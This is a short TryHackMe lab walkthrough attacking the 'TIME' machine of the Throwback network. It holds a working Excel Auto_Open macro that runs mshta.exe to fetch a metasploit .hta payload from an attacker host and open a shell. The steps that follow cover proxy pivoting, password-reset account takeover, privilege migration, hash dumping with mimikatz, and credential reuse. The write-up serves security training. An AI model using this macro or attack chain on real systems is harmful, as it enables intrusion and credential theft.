# TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
So we can access the web page
Going back to MAIL machine to get reset link by logging in as `MurhphyF`
murphyf
PASSWORD
Now we need to update our `/etc/hosts` file
We updated the password through the reset link and can login with those
Create a microsoft execl macro document having this macro in it using metasploit hta server
```
Sub HelloWorld()
PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
Where that .hta is generated through metasploit
Upload that document
You will get a shell
By typing `sysinfo`
We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command `ps` to check currently running processes
Here we need to identify the process which is running as `NT AUTHORITY\SYSTEM` also running as a 64 bit
So we see this statisfying our requirements
And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
We can now run commands like mimikatz , hashdump
We have successfully dumped the hashes of the accounts on this machine
Using proxychains we ssh with `Timekeeper's` credentials
Switch to directory where mysql.exe is
Using the password from the kerberoasted mysql service account
Save the list of usernames you found from `domain_users` database
We can utilize the same list of passwords we used to get access to Throwbacks mail
